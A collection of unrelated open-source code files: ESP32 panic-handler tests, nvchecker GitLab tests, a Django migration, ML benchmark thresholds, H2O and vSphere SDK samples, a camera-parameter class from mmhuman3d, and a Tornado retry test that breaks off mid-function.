test.instr_fetch_prohibited_inner(env, 'coredump_uart_elf_crc')
@panic_test()
def test_coredump_instr_fetch_prohibited_uart_bin_crc(env, _extra_data):
test.instr_fetch_prohibited_inner(env, 'coredump_uart_bin_crc')
@panic_test()
def test_coredump_instr_fetch_prohibited_flash_elf_sha(env, _extra_data):
test.instr_fetch_prohibited_inner(env, 'coredump_flash_elf_sha')
@panic_test()
def test_coredump_instr_fetch_prohibited_flash_bin_crc(env, _extra_data):
test.instr_fetch_prohibited_inner(env, 'coredump_flash_bin_crc')
@panic_test()
def test_gdbstub_instr_fetch_prohibited(env, _extra_data):
test.instr_fetch_prohibited_inner(env, 'gdbstub')
# test_illegal_instruction
@panic_test(target=['ESP32', 'ESP32S2'])
def test_panic_illegal_instruction(env, _extra_data):
test.illegal_instruction_inner(env, 'panic')
@panic_test()
def test_coredump_illegal_instruction_uart_elf_crc(env, _extra_data):
test.illegal_instruction_inner(env, 'coredump_uart_elf_crc')
@panic_test()
def test_coredump_illegal_instruction_uart_bin_crc(env, _extra_data):
test.illegal_instruction_inner(env, 'coredump_uart_bin_crc')
@panic_test()
def test_coredump_illegal_instruction_flash_elf_sha(env, _extra_data):
test.illegal_instruction_inner(env, 'coredump_flash_elf_sha')
@panic_test()
def test_coredump_illegal_instruction_flash_bin_crc(env, _extra_data):
test.illegal_instruction_inner(env, 'coredump_flash_bin_crc')
@panic_test()
def test_gdbstub_illegal_instruction(env, _extra_data):
test.illegal_instruction_inner(env, 'gdbstub')
# test_storeprohibited
@panic_test(target=['ESP32', 'ESP32S2'])
def test_panic_storeprohibited(env, _extra_data):
test.storeprohibited_inner(env, 'panic')
@panic_test()
def test_coredump_storeprohibited_uart_elf_crc(env, _extra_data):
test.storeprohibited_inner(env, 'coredump_uart_elf_crc')
@panic_test()
def test_coredump_storeprohibited_uart_bin_crc(env, _extra_data):
test.storeprohibited_inner(env, 'coredump_uart_bin_crc')
@panic_test()
def test_coredump_storeprohibited_flash_elf_sha(env, _extra_data):
test.storeprohibited_inner(env, 'coredump_flash_elf_sha')
@panic_test()
def test_coredump_storeprohibited_flash_bin_crc(env, _extra_data):
test.storeprohibited_inner(env, 'coredump_flash_bin_crc')
@panic_test()
def test_gdbstub_storeprohibited(env, _extra_data):
test.storeprohibited_inner(env, 'gdbstub')
# test_abort
@panic_test(target=['ESP32', 'ESP32S2'])
def test_panic_abort(env, _extra_data):
test.abort_inner(env, 'panic')
@panic_test(target=['ESP32'])
def test_panic_abort_cache_disabled(env, _extra_data):
test.abort_cached_disabled_inner(env, 'panic')
@panic_test()
def test_coredump_abort_uart_elf_crc(env, _extra_data):
test.abort_inner(env, 'coredump_uart_elf_crc')
@panic_test()
def test_coredump_abort_uart_bin_crc(env, _extra_data):
test.abort_inner(env, 'coredump_uart_bin_crc')
@panic_test()
def test_coredump_abort_flash_elf_sha(env, _extra_data):
test.abort_inner(env, 'coredump_flash_elf_sha')
@panic_test()
def test_coredump_abort_flash_bin_crc(env, _extra_data):
test.abort_inner(env, 'coredump_flash_bin_crc')
@panic_test()
def test_gdbstub_abort(env, _extra_data):
test.abort_inner(env, 'gdbstub')
# test_assert
@panic_test(target=['ESP32', 'ESP32S2'])
def test_panic_assert(env, _extra_data):
test.assert_inner(env, 'panic')
@panic_test(target=['ESP32'])
def test_panic_assert_cache_disabled(env, _extra_data):
test.assert_cached_disabled_inner(env, 'panic')
# test_ub
@panic_test()
def test_panic_ub(env, _extra_data):
test.ub_inner(env, 'panic')
@panic_test()
def test_coredump_ub_uart_elf_crc(env, _extra_data):
test.ub_inner(env, 'coredump_uart_elf_crc')
@panic_test()
def test_coredump_ub_uart_bin_crc(env, _extra_data):
test.ub_inner(env, 'coredump_uart_bin_crc')
@panic_test()
def test_coredump_ub_flash_elf_sha(env, _extra_data):
test.ub_inner(env, 'coredump_flash_elf_sha')
@panic_test()
def test_coredump_ub_flash_bin_crc(env, _extra_data):
test.ub_inner(env, 'coredump_flash_bin_crc')
@panic_test()
def test_gdbstub_ub(env, _extra_data):
test.ub_inner(env, 'gdbstub')
if __name__ == '__main__':
run_all(__file__, sys.argv[1:])
|
tests/test_gitlab.py
|
trathborne/nvchecker
| 320 |
66966
|
<reponame>trathborne/nvchecker<filename>tests/test_gitlab.py
# MIT licensed
# Copyright (c) 2013-2020 lilydjwg <<EMAIL>>, et al.
import pytest
pytestmark = [pytest.mark.asyncio, pytest.mark.needs_net]
async def test_gitlab(get_version):
ver = await get_version("example", {
"source": "gitlab",
"gitlab": "gitlab-org/gitlab-test",
})
assert len(ver) == 8
assert ver.isdigit()
async def test_gitlab_blm(get_version):
# repo with a custom main branch
ver = await get_version("example", {
"source": "gitlab",
"gitlab": "asus-linux/asusctl",
})
assert len(ver) == 8
assert ver.isdigit()
async def test_gitlab_max_tag(get_version):
assert await get_version("example", {
"source": "gitlab",
"gitlab": "gitlab-org/gitlab-test",
"use_max_tag": True,
}) == "v1.1.1"
async def test_gitlab_max_tag_with_include(get_version):
assert await get_version("example", {
"source": "gitlab",
"gitlab": "gitlab-org/gitlab-test",
"use_max_tag": True,
"include_regex": r'v1\.0.*',
}) == "v1.0.0"
async def test_gitlab_max_tag_with_ignored(get_version):
assert await get_version("example", {
"source": "gitlab",
"gitlab": "gitlab-org/gitlab-test",
"use_max_tag": True,
"ignored": "v1.1.0 v1.1.1",
}) == "v1.0.0"
|
orochi/users/migrations/0003_user_services.py
|
garanews/orochi
| 121 |
66981
|
# Generated by Django 3.1 on 2020-08-05 13:09
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('website', '0012_service'),
('users', '0002_alter_user_first_name'),
]
operations = [
migrations.AddField(
model_name='user',
name='services',
field=models.ManyToManyField(to='website.Service'),
),
]
|
src/benchmark_metrics.py
|
Yixiao99/deep-learning-containers
| 383 |
66998
|
<filename>src/benchmark_metrics.py
from packaging.specifiers import SpecifierSet
from packaging.version import Version
# TensorFlow
# Throughput, unit: images/second
TENSORFLOW_TRAINING_CPU_SYNTHETIC_THRESHOLD = {"<2.0": 50, ">=2.0": 50}
TENSORFLOW_TRAINING_GPU_SYNTHETIC_THRESHOLD = {"<2.0": 5000, ">=2.0": 7000}
TENSORFLOW_TRAINING_GPU_IMAGENET_THRESHOLD = {"<2.0": 5000, ">=2.0": 7000}
# p99 latency, unit: second
TENSORFLOW_INFERENCE_CPU_THRESHOLD = {
"<2.0": {
"INCEPTION": 0.06, "RCNN-Resnet101-kitti": 0.65, "Resnet50v2": 0.35, "MNIST": 0.00045, "SSDResnet50Coco": 0.4,
},
">=2.0,<2.4": {
"INCEPTION": 0.06, "RCNN-Resnet101-kitti": 0.65, "Resnet50v2": 0.35, "MNIST": 0.00045, "SSDResnet50Coco": 0.4,
},
# Updated thresholds for TF 2.4.1 CPU from Vanilla TF 2.4
">=2.4": {
"INCEPTION": 0.11, "RCNN-Resnet101-kitti": 2.1, "Resnet50v2": 0.35, "MNIST": 0.001, "SSDResnet50Coco": 1.2,
},
}
TENSORFLOW_INFERENCE_GPU_THRESHOLD = {
"<2.0": {
"INCEPTION": 0.04, "RCNN-Resnet101-kitti": 0.06, "Resnet50v2": 0.014, "MNIST": 0.0024, "SSDResnet50Coco": 0.1,
},
">=2.0": {
"INCEPTION": 0.04, "RCNN-Resnet101-kitti": 0.06, "Resnet50v2": 0.014, "MNIST": 0.0024, "SSDResnet50Coco": 0.1,
},
}
# Throughput, unit: images/second
TENSORFLOW_SM_TRAINING_CPU_1NODE_THRESHOLD = {">=2.0": 30}
TENSORFLOW_SM_TRAINING_CPU_4NODE_THRESHOLD = {">=2.0": 20}
TENSORFLOW_SM_TRAINING_GPU_1NODE_THRESHOLD = {">=2.0": 2500}
TENSORFLOW_SM_TRAINING_GPU_4NODE_THRESHOLD = {">=2.0": 2500}
# MXNet
# Throughput, unit: images/second
MXNET_TRAINING_CPU_CIFAR_THRESHOLD = {">=1.0": 1000}
MXNET_TRAINING_GPU_IMAGENET_THRESHOLD = {">=1.0": 4500}
MXNET_INFERENCE_CPU_IMAGENET_THRESHOLD = {">=1.0": 100}
MXNET_INFERENCE_GPU_IMAGENET_THRESHOLD = {">=1.0": 4500}
# Accuracy, unit: NA
MXNET_TRAINING_GPU_IMAGENET_ACCURACY_THRESHOLD = {">=1.0": 0.9}
# Latency, unit: sec/epoch
MXNET_TRAINING_GPU_IMAGENET_LATENCY_THRESHOLD = {">=1.0": 120}
# PyTorch
# Throughput, unit: images/second
PYTORCH_TRAINING_GPU_SYNTHETIC_THRESHOLD = {">=1.0": 2400}
# Training Time Cost, unit: second/epoch
PYTORCH_TRAINING_GPU_IMAGENET_THRESHOLD = {">=1.0": 660}
# p99 latency, unit: millisecond
PYTORCH_INFERENCE_CPU_THRESHOLD = {
">=1.0": {
"ResNet18": 0.08,
"VGG13": 0.45,
"MobileNetV2": 0.06,
"GoogleNet": 0.12,
"DenseNet121": 0.15,
"InceptionV3": 0.25,
}
}
PYTORCH_INFERENCE_GPU_THRESHOLD = {
">=1.0": {
"ResNet18": 0.0075,
"VGG13": 0.004,
"MobileNetV2": 0.013,
"GoogleNet": 0.018,
"DenseNet121": 0.04,
"InceptionV3": 0.03,
}
}
def get_threshold_for_image(framework_version, lookup_table):
"""
Find the correct threshold value(s) for a given framework version and a dict from which to lookup values.
:param framework_version: Framework version of the image being tested
:param lookup_table: The relevant dict from one of the dicts defined in this script
:return: Threshold value as defined by one of the dicts in this script
"""
for spec, threshold_val in lookup_table.items():
if Version(framework_version) in SpecifierSet(spec):
return threshold_val
raise KeyError(
f"{framework_version} does not satisfy any version constraint available in "
f"{lookup_table.keys()}"
)
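# --- Usage sketch (illustrative only) ----------------------------------------
# A hedged example of how the lookup is intended to be used. The version strings
# below are arbitrary; they only demonstrate how a framework version is matched
# against the SpecifierSet keys of the threshold dicts defined above.
if __name__ == "__main__":
    # TF 2.4.1 falls into the ">=2.4" bucket of the CPU inference thresholds
    print(get_threshold_for_image("2.4.1", TENSORFLOW_INFERENCE_CPU_THRESHOLD))
    # PyTorch 1.8.0 falls into the ">=1.0" bucket of the GPU training throughput threshold
    print(get_threshold_for_image("1.8.0", PYTORCH_TRAINING_GPU_SYNTHETIC_THRESHOLD))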
|
h2o-docs/src/booklets/v2_2015/source/GBM_Vignette_code_examples/gbm_uploadfile_example.py
|
ahmedengu/h2o-3
| 6,098 |
67010
|
<gh_stars>1000+
import h2o
h2o.init()
weather_hex = h2o.import_file("http://h2o-public-test-data.s3.amazonaws.com/smalldata/junit/weather.csv")
# Get a summary of the data
weather_hex.describe()
|
samples/vsphere/vcenter/topologysvc/list_replication_status.py
|
JKraftman/vsphere-automation-sdk-python
| 589 |
67033
|
#!/usr/bin/env python
"""
* *******************************************************
* Copyright (c) VMware, Inc. 2020. All Rights Reserved.
* SPDX-License-Identifier: MIT
* *******************************************************
*
* DISCLAIMER. THIS PROGRAM IS PROVIDED TO YOU "AS IS" WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, WHETHER ORAL OR WRITTEN,
* EXPRESS OR IMPLIED. THE AUTHOR SPECIFICALLY DISCLAIMS ANY IMPLIED
* WARRANTIES OR CONDITIONS OF MERCHANTABILITY, SATISFACTORY QUALITY,
* NON-INFRINGEMENT AND FITNESS FOR A PARTICULAR PURPOSE.
"""
__author__ = 'VMware, Inc.'
__vcenter_version__ = '7.0+'
from vmware.vapi.vsphere.client import create_vsphere_client
from samples.vsphere.common import (sample_cli, sample_util)
from samples.vsphere.common.ssl_helper import get_unverified_session
"""
Description: Demonstrates listing of the vCenter Server or Platform service
controller node's information in Link Mode in an SSO Domain.
Sample Prerequisites:
- The user invoking the API should have the System.Read privilege.
"""
parser = sample_cli.build_arg_parser()
args = sample_util.process_cli_args(parser.parse_args())
session = get_unverified_session() if args.skipverification else None
# Login to vCenter
vsphere_client = create_vsphere_client(server=args.server,
username=args.username,
password=args.password,
session=session)
print(vsphere_client.vcenter.topology.ReplicationStatus.list())
|
mmhuman3d/core/cameras/camera_parameters.py
|
yl-1993/mmhuman3d
| 472 |
67045
|
import json
import warnings
from enum import Enum
from typing import Any, List, Tuple, Union
import numpy as np
import torch
from mmhuman3d.core.cameras.cameras import PerspectiveCameras
from mmhuman3d.core.conventions.cameras.convert_convention import (
convert_camera_matrix,
convert_K_3x3_to_4x4,
convert_K_4x4_to_3x3,
)
from .builder import build_cameras
_CAMERA_PARAMETER_SUPPORTED_KEYS_ = {
'H': {
'type': int,
},
'W': {
'type': int,
},
'in_mat': {
'type': list,
'len': 3,
},
'rotation_mat': {
'type': list,
'len': 3,
},
'translation': {
'type': list,
'len': 3,
},
'k1': {
'type': float,
},
'k2': {
'type': float,
},
'k3': {
'type': float,
},
'k4': {
'type': float,
},
'k5': {
'type': float,
},
'k6': {
'type': float,
},
'p1': {
'type': float,
},
'p2': {
'type': float,
},
}
class _TypeValidation(Enum):
MATCH = 0
ARRAY = 1
FAIL = 2
class CameraParameter:
logger = None
SUPPORTED_KEYS = _CAMERA_PARAMETER_SUPPORTED_KEYS_
def __init__(self,
name: str = 'default',
H: int = 1080,
W: int = 1920) -> None:
"""
Args:
name (str, optional):
Name of this camera. Defaults to "default".
H (int, optional):
Height of a frame, in pixel. Defaults to 1080.
W (int, optional):
Width of a frame, in pixel. Defaults to 1920.
"""
self.name = name
self.parameters_dict = {}
in_mat = __zero_mat_list__(3)
self.parameters_dict['in_mat'] = in_mat
for distort_name in __distort_coefficient_names__:
self.parameters_dict[distort_name] = 0.0
_, H = self.validate_item('H', H)
self.parameters_dict['H'] = H
_, W = self.validate_item('W', W)
self.parameters_dict['W'] = W
r_mat = __zero_mat_list__(3)
self.parameters_dict['rotation_mat'] = r_mat
t_list = [0.0, 0.0, 0.0]
self.parameters_dict['translation'] = t_list
def reset_distort(self) -> None:
"""Reset all distort coefficients to zero."""
for distort_name in __distort_coefficient_names__:
self.parameters_dict[distort_name] = 0.0
def get_opencv_distort_mat(self) -> np.ndarray:
"""Get a numpy array of 8 distort coefficients, which is the distCoeffs
arg of cv2.undistort.
Returns:
ndarray:
(k_1, k_2, p_1, p_2, k_3, k_4, k_5, k_6) of 8 elements.
"""
dist_coeffs = [
self.get_value('k1'),
self.get_value('k2'),
self.get_value('p1'),
self.get_value('p2'),
self.get_value('k3'),
self.get_value('k4'),
self.get_value('k5'),
self.get_value('k6'),
]
dist_coeffs = np.array(dist_coeffs)
return dist_coeffs
def set_KRT(self,
K_mat: np.ndarray,
R_mat: np.ndarray,
T_vec: np.ndarray,
inverse_extrinsic: bool = False) -> None:
"""Set intrinsic and extrinsic of a camera.
Args:
K_mat (np.ndarray):
In shape [3, 3].
R_mat (np.ndarray):
Rotation from world to view in default.
In shape [3, 3].
T_vec (np.ndarray):
Translation from world to view in default.
In shape [3,].
inverse_extrinsic (bool, optional):
If true, R_mat and T_vec transform a point
from view to world. Defaults to False.
"""
k_shape = K_mat.shape
assert k_shape[0] == k_shape[1] == 3
r_shape = R_mat.shape
assert r_shape[0] == r_shape[1] == 3
assert T_vec.ndim == 1 and T_vec.shape[0] == 3
self.set_mat_np('in_mat', K_mat)
if inverse_extrinsic:
R_mat = np.linalg.inv(R_mat)
T_vec = -np.dot(R_mat, T_vec).reshape((3))
self.set_mat_np('rotation_mat', R_mat)
self.set_value('translation', T_vec.tolist())
def get_KRT(self, k_dim=3) -> List[np.ndarray]:
"""Get intrinsic and extrinsic of a camera.
Args:
k_dim (int, optional):
Dimension of the returned mat K.
Defaults to 3.
Raises:
ValueError: k_dim is neither 3 nor 4.
Returns:
List[np.ndarray]:
K_mat (np.ndarray):
In shape [3, 3].
R_mat (np.ndarray):
Rotation from world to view in default.
In shape [3, 3].
T_vec (np.ndarray):
Translation from world to view in default.
In shape [3,].
"""
K_3x3 = self.get_mat_np('in_mat')
R_mat = self.get_mat_np('rotation_mat')
T_vec = np.asarray(self.get_value('translation'))
if k_dim == 3:
return [K_3x3, R_mat, T_vec]
elif k_dim == 4:
K_3x3 = np.expand_dims(K_3x3, 0) # shape (1, 3, 3)
K_4x4 = convert_K_3x3_to_4x4(
K=K_3x3, is_perspective=True) # shape (1, 4, 4)
K_4x4 = K_4x4[0, :, :]
return [K_4x4, R_mat, T_vec]
else:
raise ValueError(f'K mat cannot be converted to {k_dim}x{k_dim}')
def set_mat_np(self, mat_key: str, mat_numpy: np.ndarray) -> None:
"""Set a matrix-type parameter to mat_numpy.
Args:
mat_key (str):
Key of the target matrix. in_mat or rotation_mat.
mat_numpy (ndarray):
Matrix in numpy format.
Raises:
TypeError:
mat_numpy is not an np.ndarray.
"""
if not isinstance(mat_numpy, np.ndarray):
raise TypeError
self.set_mat_list(mat_key, mat_numpy.tolist())
def set_mat_list(self, mat_key: str, mat_list: List[list]) -> None:
"""Set a matrix-type parameter to mat_list.
Args:
mat_key (str):
Key of the target matrix. in_mat or rotation_mat.
mat_list (List[list]):
Matrix in list format.
"""
_, mat_list = self.validate_item(mat_key, mat_list)
self.parameters_dict[mat_key] = mat_list
def set_value(self, key: str, value: Any) -> None:
"""Set a parameter to value.
Args:
key (str):
Name of the parameter.
value (object):
New value of the parameter.
"""
_, value = self.validate_item(key, value)
self.parameters_dict[key] = value
def get_value(self, key: str) -> Any:
"""Get a parameter by key.
Args:
key (str):
Name of the parameter.
Raises:
KeyError: key not in self.parameters_dict
Returns:
object:
Value of the parameter.
"""
if key not in self.parameters_dict:
raise KeyError(key)
else:
return self.parameters_dict[key]
def get_mat_np(self, key: str) -> np.ndarray:
"""Get a a matrix-type parameter by key.
Args:
key (str):
Name of the parameter.
Raises:
KeyError: key not in self.parameters_dict
Returns:
ndarray:
Value of the parameter.
"""
if key not in self.parameters_dict:
raise KeyError(key)
else:
mat_list = self.parameters_dict[key]
mat_np = np.array(mat_list).reshape((3, 3))
return mat_np
def to_string(self) -> str:
"""Convert self.to_dict() to a string.
Returns:
str:
A dict in json string format.
"""
dump_dict = self.to_dict()
ret_str = json.dumps(dump_dict)
return ret_str
def to_dict(self) -> dict:
"""Dump camera name and parameters to dict.
Returns:
dict:
Put self.name and self.parameters_dict
in one dict.
"""
dump_dict = self.parameters_dict.copy()
dump_dict['name'] = self.name
return dump_dict
def dump(self, json_path: str) -> None:
"""Dump camera name and parameters to a file.
Returns:
dict:
Put self.name and self.parameters_dict
in one dict, and dump them to a json file.
"""
dump_dict = self.to_dict()
with open(json_path, 'w') as f_write:
json.dump(dump_dict, f_write)
def load(self, json_path: str) -> None:
"""Load camera name and parameters from a file."""
with open(json_path, 'r') as f_read:
dumped_dict = json.load(f_read)
self.load_from_dict(dumped_dict)
def load_from_dict(self, json_dict: dict) -> None:
"""Load name and parameters from a dict.
Args:
json_dict (dict):
A dict comes from self.to_dict().
"""
for key in json_dict.keys():
if key == 'name':
self.name = json_dict[key]
elif key == 'rotation':
self.parameters_dict['rotation_mat'] = np.array(
json_dict[key]).reshape(3, 3).tolist()
elif key == 'translation':
self.parameters_dict[key] = np.array(json_dict[key]).reshape(
(3)).tolist()
else:
self.parameters_dict[key] = json_dict[key]
if '_mat' in key:
self.parameters_dict[key] = np.array(
self.parameters_dict[key]).reshape(3, 3).tolist()
def load_from_chessboard(self,
chessboard_dict: dict,
name: str,
inverse: bool = True) -> None:
"""Load name and parameters from a dict.
Args:
chessboard_dict (dict):
A dict loaded from json.load(chessboard_file).
name (str):
Name of this camera.
inverse (bool, optional):
                Whether to invert the rotation and translation matrices.
                Defaults to True.
"""
camera_param_dict = \
__parse_chessboard_param__(chessboard_dict, name, inverse=inverse)
self.load_from_dict(camera_param_dict)
def load_kinect_from_smc(self, smc_reader, kinect_id: int) -> None:
"""Load name and parameters of a kinect from an SmcReader instance.
Args:
smc_reader (mmhuman3d.data.data_structures.smc_reader.SMCReader):
An SmcReader instance containing kinect camera parameters.
kinect_id (int):
Id of the target kinect.
"""
name = kinect_id
extrinsics_dict = \
smc_reader.get_kinect_color_extrinsics(
kinect_id, homogeneous=False
)
rot_np = extrinsics_dict['R']
trans_np = extrinsics_dict['T']
intrinsics_np = \
smc_reader.get_kinect_color_intrinsics(
kinect_id
)
resolution = \
smc_reader.get_kinect_color_resolution(
kinect_id
)
rmatrix = np.linalg.inv(rot_np).reshape(3, 3)
tvec = -np.dot(rmatrix, trans_np)
self.name = name
self.set_mat_np('in_mat', intrinsics_np)
self.set_mat_np('rotation_mat', rmatrix)
self.set_value('translation', tvec.tolist())
self.set_value('H', resolution[1])
self.set_value('W', resolution[0])
def load_iphone_from_smc(self,
smc_reader,
iphone_id: int = 0,
frame_id: int = 0) -> None:
"""Load name and parameters of an iPhone from an SmcReader instance.
Args:
smc_reader (mmhuman3d.data.data_structures.smc_reader.SMCReader):
An SmcReader instance containing kinect camera parameters.
iphone_id (int):
Id of the target iphone.
Defaults to 0.
frame_id (int):
Frame ID of one selected frame.
It only influences the intrinsics.
Defaults to 0.
"""
name = f'iPhone_{iphone_id}'
extrinsics_mat = \
smc_reader.get_iphone_extrinsics(
iphone_id, homogeneous=True
)
rot_np = extrinsics_mat[:3, :3]
trans_np = extrinsics_mat[:3, 3]
intrinsics_np = \
smc_reader.get_iphone_intrinsics(
iphone_id, frame_id
)
resolution = \
smc_reader.get_iphone_color_resolution(
iphone_id
)
rmatrix = np.linalg.inv(rot_np).reshape(3, 3)
tvec = -np.dot(rmatrix, trans_np)
self.name = name
self.set_mat_np('in_mat', intrinsics_np)
self.set_mat_np('rotation_mat', rmatrix)
self.set_value('translation', tvec.tolist())
self.set_value('H', resolution[1])
self.set_value('W', resolution[0])
@classmethod
def load_from_perspective_cameras(cls,
cam,
name: str,
resolution: Union[List, Tuple] = None):
"""Load parameters from a PerspectiveCameras and return a
CameraParameter.
Args:
cam (mmhuman3d.core.cameras.cameras.PerspectiveCameras):
An instance.
name (str):
Name of this camera.
"""
assert isinstance(cam, PerspectiveCameras
), 'Wrong input, support PerspectiveCameras only!'
if len(cam) > 1:
warnings.warn('Will only use the first camera in the batch.')
cam = cam[0]
resolution = resolution if resolution is not None else cam.resolution[
0].tolist()
height, width = int(resolution[0]), int(resolution[1])
        cam_param = CameraParameter(H=height, W=width, name=name)
k_4x4 = cam.K # shape (1, 4, 4)
r_3x3 = cam.R # shape (1, 3, 3)
t_3 = cam.T # shape (1, 3)
is_perspective = cam.is_perspective()
in_ndc = cam.in_ndc()
k_4x4, r_3x3, t_3 = convert_camera_matrix(
K=k_4x4,
R=r_3x3,
T=t_3,
is_perspective=False,
in_ndc_dst=False,
in_ndc_src=in_ndc,
convention_src='pytorch3d',
convention_dst='opencv',
resolution_src=(height, width),
resolution_dst=(height, width))
k_3x3 = \
convert_K_4x4_to_3x3(k_4x4, is_perspective=is_perspective)
k_3x3 = k_3x3.numpy()[0]
r_3x3 = r_3x3.numpy()[0]
t_3 = t_3.numpy()[0]
cam_param.name = name
cam_param.set_mat_np('in_mat', k_3x3)
cam_param.set_mat_np('rotation_mat', r_3x3)
cam_param.set_value('translation', t_3.tolist())
cam_param.parameters_dict.update(H=height)
cam_param.parameters_dict.update(W=width)
return cam_param
def export_to_perspective_cameras(self) -> PerspectiveCameras:
"""Export to a opencv defined screen space PerspectiveCameras.
Returns:
Same defined PerspectiveCameras of batch_size 1.
"""
height = self.parameters_dict['H']
width = self.parameters_dict['W']
k_4x4, rotation, translation = self.get_KRT(k_dim=4)
        k_4x4 = np.expand_dims(k_4x4, 0)  # shape (1, 4, 4)
rotation = np.expand_dims(rotation, 0) # shape (1, 3, 3)
translation = np.expand_dims(translation, 0) # shape (1, 3)
new_K = torch.from_numpy(k_4x4)
new_R = torch.from_numpy(rotation)
new_T = torch.from_numpy(translation)
cam = build_cameras(
dict(
type='PerspectiveCameras',
K=new_K.float(),
R=new_R.float(),
T=new_T.float(),
convention='opencv',
in_ndc=False,
resolution=(height, width)))
return cam
def validate_item(self, key: Any, val: Any) -> List:
"""Check whether the key and its value matches definition in
CameraParameter.SUPPORTED_KEYS.
Args:
key (Any):
Key in CameraParameter.
val (Any):
Value to the key.
Raises:
KeyError:
key cannot be found in
CameraParameter.SUPPORTED_KEYS.
TypeError:
Value's type doesn't match definition.
Returns:
key (Any): The input key.
            val (Any): The value cast into the correct format.
"""
self.__check_key__(key)
formatted_val = self.__validate_value_type__(key, val)
return key, formatted_val
def __check_key__(self, key: Any) -> None:
"""Check whether the key matches definition in
CameraParameter.SUPPORTED_KEYS.
Args:
key (Any):
Key in CameraParameter.
Raises:
KeyError:
key cannot be found in
CameraParameter.SUPPORTED_KEYS.
"""
if key not in self.__class__.SUPPORTED_KEYS:
err_msg = 'Key check failed in CameraParameter:\n'
err_msg += f'key={str(key)}\n'
raise KeyError(err_msg)
def __validate_value_type__(self, key: Any, val: Any) -> Any:
"""Check whether the type of value matches definition in
CameraParameter.SUPPORTED_KEYS.
Args:
key (Any):
Key in CameraParameter.
val (Any):
Value to the key.
Raises:
TypeError:
Value is supported but doesn't match definition.
Returns:
            val (Any): The value cast into the correct format.
"""
np_type_mapping = {int: np.integer, float: np.floating}
supported_keys = self.__class__.SUPPORTED_KEYS
validation_result = _TypeValidation.FAIL
ret_val = None
if supported_keys[key]['type'] == int or\
supported_keys[key]['type'] == float:
type_str = str(type(val))
class_name = type_str.split('\'')[1]
if type(val) == self.__class__.SUPPORTED_KEYS[key]['type']:
validation_result = _TypeValidation.MATCH
ret_val = val
elif class_name.startswith('numpy'):
# a value is required, not array
if np.issubdtype(
type(val),
np_type_mapping[supported_keys[key]['type']]):
validation_result = _TypeValidation.MATCH
ret_val = val.astype(supported_keys[key]['type'])
elif np.issubdtype(type(val), np.ndarray):
validation_result = _TypeValidation.ARRAY
elif class_name.startswith('torch'):
# only one element tensors
# can be converted to Python scalars
if len(val.size()) == 0:
val_item = val.item()
if type(val_item) == supported_keys[key]['type']:
validation_result = _TypeValidation.MATCH
ret_val = val_item
else:
validation_result = _TypeValidation.ARRAY
else:
if type(val) == self.__class__.SUPPORTED_KEYS[key]['type']:
validation_result = _TypeValidation.MATCH
ret_val = val
if validation_result != _TypeValidation.MATCH:
err_msg = 'Type check failed in CameraParameter:\n'
err_msg += f'key={str(key)}\n'
err_msg += f'type(val)={type(val)}\n'
if validation_result == _TypeValidation.ARRAY:
err_msg += 'A single value is expected, ' +\
'neither an array nor a slice.\n'
raise TypeError(err_msg)
return ret_val
def __parse_chessboard_param__(chessboard_camera_param, name, inverse=True):
"""Parse a dict loaded from chessboard file into another dict needed by
CameraParameter.
Args:
chessboard_camera_param (dict):
A dict loaded from json.load(chessboard_file).
name (str):
Name of this camera.
inverse (bool, optional):
Whether to inverse rotation and translation mat.
Defaults to True.
Returns:
dict:
A dict of parameters in CameraParameter.to_dict() format.
"""
camera_param_dict = {}
camera_param_dict['H'] = chessboard_camera_param['imgSize'][1]
camera_param_dict['W'] = chessboard_camera_param['imgSize'][0]
camera_param_dict['in_mat'] = chessboard_camera_param['K']
camera_param_dict['k1'] = 0
camera_param_dict['k2'] = 0
camera_param_dict['k3'] = 0
camera_param_dict['k4'] = 0
camera_param_dict['k5'] = 0
camera_param_dict['p1'] = 0
camera_param_dict['p2'] = 0
camera_param_dict['name'] = name
camera_param_dict['rotation'] = chessboard_camera_param['R']
camera_param_dict['translation'] = chessboard_camera_param['T']
if inverse:
rmatrix = np.linalg.inv(
np.array(camera_param_dict['rotation']).reshape(3, 3))
camera_param_dict['rotation'] = rmatrix.tolist()
tmatrix = np.array(camera_param_dict['translation']).reshape((3, 1))
tvec = -np.dot(rmatrix, tmatrix)
camera_param_dict['translation'] = tvec.reshape((3)).tolist()
return camera_param_dict
__distort_coefficient_names__ = [
'k1', 'k2', 'k3', 'k4', 'k5', 'k6', 'p1', 'p2'
]
def __zero_mat_list__(n=3):
"""Return a zero mat in list format.
Args:
n (int, optional):
Length of the edge.
Defaults to 3.
Returns:
list:
List[List[int]]
"""
ret_list = [[0] * n for _ in range(n)]
return ret_list
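# --- Usage sketch (illustrative only) ----------------------------------------
# A minimal, hedged example of round-tripping intrinsics/extrinsics through
# CameraParameter.set_KRT() and get_KRT(). The intrinsic matrix values are made
# up for illustration and do not correspond to any real camera.
def _example_camera_parameter():
    K = np.array([[1000.0, 0.0, 960.0],
                  [0.0, 1000.0, 540.0],
                  [0.0, 0.0, 1.0]])
    R = np.eye(3)
    T = np.array([0.0, 0.0, 1.0])
    cam_param = CameraParameter(name='example_cam', H=1080, W=1920)
    cam_param.set_KRT(K, R, T)
    K_out, R_out, T_out = cam_param.get_KRT(k_dim=3)
    assert np.allclose(K, K_out) and np.allclose(R, R_out) and np.allclose(T, T_out)
    return cam_param.to_dict()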
|
modules/dbnd/src/dbnd/_vendor/tenacity/tests/test_tornado.py
|
busunkim96/dbnd
| 224 |
67051
|
<reponame>busunkim96/dbnd
# coding: utf-8
# Copyright 2017 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from dbnd._vendor.tenacity import retry
from dbnd._vendor.tenacity import tornadoweb
from dbnd._vendor.tenacity.tests.test_tenacity import NoIOErrorAfterCount
from tornado import gen
from tornado import testing
@retry
@gen.coroutine
def _retryable_coroutine(thing):
yield gen.sleep(0.00001)
thing.go()
class TestTornado(testing.AsyncTestCase):
@testing.gen_test
def test_retry(self):
assert gen.is_coroutine_function(_retryable_coroutine)
thing = NoIOErrorAfterCount(5)
yield _retryable_coroutine(thing)
assert thing.counter == thing.count
def test_repr(self):
repr(tornadoweb.TornadoRetrying())
def test_old_tornado(self):
